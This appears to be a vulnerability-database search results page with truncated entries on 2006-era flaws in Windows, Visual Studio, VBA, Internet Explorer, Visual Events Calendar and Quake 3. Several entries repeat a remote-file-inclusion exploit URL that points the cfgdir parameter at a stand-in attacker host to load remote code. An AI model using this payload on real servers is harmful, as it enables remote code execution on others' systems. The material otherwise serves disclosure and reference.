8759 matches found
MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)
No description provided by source. // Microsoft Windows PNG IHDR block DoS PoC 2 // // CPU load goes to 100% until you restart explorer.exe // // Bug found by: Preddy ? // // Compiled and tested with Windows XP SP2, Visual studio 6, no psdk // // Header: 89 50 4e 47 0d 0a // // Greets: scoper,...
Microsoft Visual Studio UserControl远程代码执行漏洞
BUGTRAQ ID: 16225 Microsoft Visual Studio是微软公司的开发工具套件系列产品,是一个基本完整的开发工具集,包括了软件整个生命周期中所需要的大部分工具。 Visual Studio没有事先通知用户便允许执行一个项目文件中的代码。在将UserControl添加到Windows Formular中时,如果显示了UserControl所在的主窗体的话,VS就可能自动启动UserControlLoad函数中的代码。 Microsoft Visual Studio 2005 Microsoft ---------...
CVE-2006-4060
PHP remote file inclusion vulnerability in calendar.php in Visual Events Calendar 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the cfgdir parameter...
CVE-2006-4060
CVE-2006-4060 : PHP remote file inclusion in calendar.php of Visual Events Calendar 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the cfg_dir parameter. The vulnerability affects Visual Events Calendar 1.1; exploitation would arise from an attacker-supplied URL in cfg_dir...
CVE-2006-4060
PHP remote file inclusion vulnerability in calendar.php in Visual Events Calendar 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the cfgdir parameter...
CVE-2006-3649
CVE-2006-3649 describes a remote code execution vulnerability in Microsoft Visual Basic for Applications (VBA) across VBA SDK 6.0–6.4 used by Office 2000 SP3, Office XP SP3, and related apps. The flaw stems from an improper boundary check / validation of document properties passed to VBA when ope...
Microsoft Visual Basic for Applications buffer overflow
Buffer oveflow on VBA script parsing...
Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service
Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service source: https://www.securityfocus.com/bid/19572/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability that occurs when instantiating Visual Studio COM objects. The vulnerability arise...
Visual Events Calendar v1.1 (cfg_dir) Remote Inclusion Vulnerability
title: Visual Events Calendar v1.1 cfgdir Remote Inclusion Vulnerability Author: xoron script: Visual Events Calendar v1.1 Class : Remote cont@ct: x0r0nathotmaildotcom CODE: include $cfgdir."customizetext.php"; Exploit: http://www.site.com/path/calendar.php?cfgdir=http://evilscripts? Thanx :...
Microsoft Security Bulletin MS06-047 Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution (921645)
Microsoft Security Bulletin MS06-047 Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution 921645 Published: August 8, 2006 Version: 1.0 Summary Who Should Read this Document: Customers using Microsoft Office applications or applications that use Microsoft...
Microsoft Visual Basic for Applications buffer overflow
Overview Microsoft Visual Basic for Applications fails to properly validate document properties. This vulnerability could allow a remote attacker to execute arbitrary code. Description Visual Basic For Applications VBA According to Microsoft Security Bulletin MS06-047: Microsoft VBA is a...
VulnCheck KEV: CVE-2006-3649
Buffer overflow in Microsoft Visual Basic for Applications VBA SDK 6.0 through 6.4, as used by Microsoft Office 2000 SP3, Office XP SP3, Project 2000 SR1, Project 2002 SP1, Access 2000 Runtime SP3, Visio 2002 SP2, and Works Suite 2004 through 2006, allows user-assisted attackers to execute...
Microsoft Visual Basic for Applications Document Check Buffer Overflow Vulnerability
Description A vulnerability has been discovered in Microsoft Visual Basic for Applications. The vulnerability occurs due to insufficient bounds checking when checking the properties of malicious documents. As a result, a malformed document may be able to trigger a buffer-overflow within the...
MS06-047: Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution (921645)
The remote host is running a version of Microsoft Visual Basic for Applications that is vulnerable to a buffer overflow when handling malformed documents. An attacker may exploit this flaw to execute arbitrary code on this host by sending a malformed file to a user of the remote host. C Tenable...
Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service
source: https://www.securityfocus.com/bid/19572/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability that occurs when instantiating Visual Studio COM objects. The vulnerability arises because of the way Internet Explorer tries to instantiate certain COM objects as Active...
Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion
title: Visual Events Calendar v1.1 cfgdir Remote Inclusion Vulnerability Author: xoron script: Visual Events Calendar v1.1 Class : Remote cont@ct: x0r0nathotmaildotcom CODE: include $cfgdir."customizetext.php"; Exploit: http://www.site.com/path/calendar.php?cfgdir=http://evilscripts? Thanx :...
Visual Events Calendar 1.1 - cfg_dir Remote File Inclusion
Visual Events Calendar 1.1 - cfgdir Remote File Inclusion title: Visual Events Calendar v1.1 cfgdir Remote Inclusion Vulnerability Author: xoron script: Visual Events Calendar v1.1 Class : Remote cont@ct: x0r0nathotmaildotcom CODE: include $cfgdir."customizetext.php"; Exploit:...
Visual Events Calendar 1.1 (cfg_dir) Remote Include Vulnerability
Exploit for unknown platform in category web applications ================================================================= Visual Events Calendar 1.1 cfgdir Remote Include Vulnerability ================================================================= title: Visual Events Calendar v1.1 cfgdir...
Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow
/ Quake 3 Engine Client CSITEMS Remote Stack Overflow Exploit Win32 Written by RunningBon E-Mail: [email protected] IRC: irc.rizon.net kik This is a DLL, which gets injected into the server exe. You will need Microsoft Detours library to compile this exploit...
Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow
Quake 3 Engine Client Windows x86 - CSITEms Remote Overflow / Quake 3 Engine Client CSITEMS Remote Stack Overflow Exploit Win32 Written by RunningBon E-Mail: [email protected] IRC: irc.rizon.net kik This is a DLL, which gets injected into the server exe. You will need Microsoft Detours library...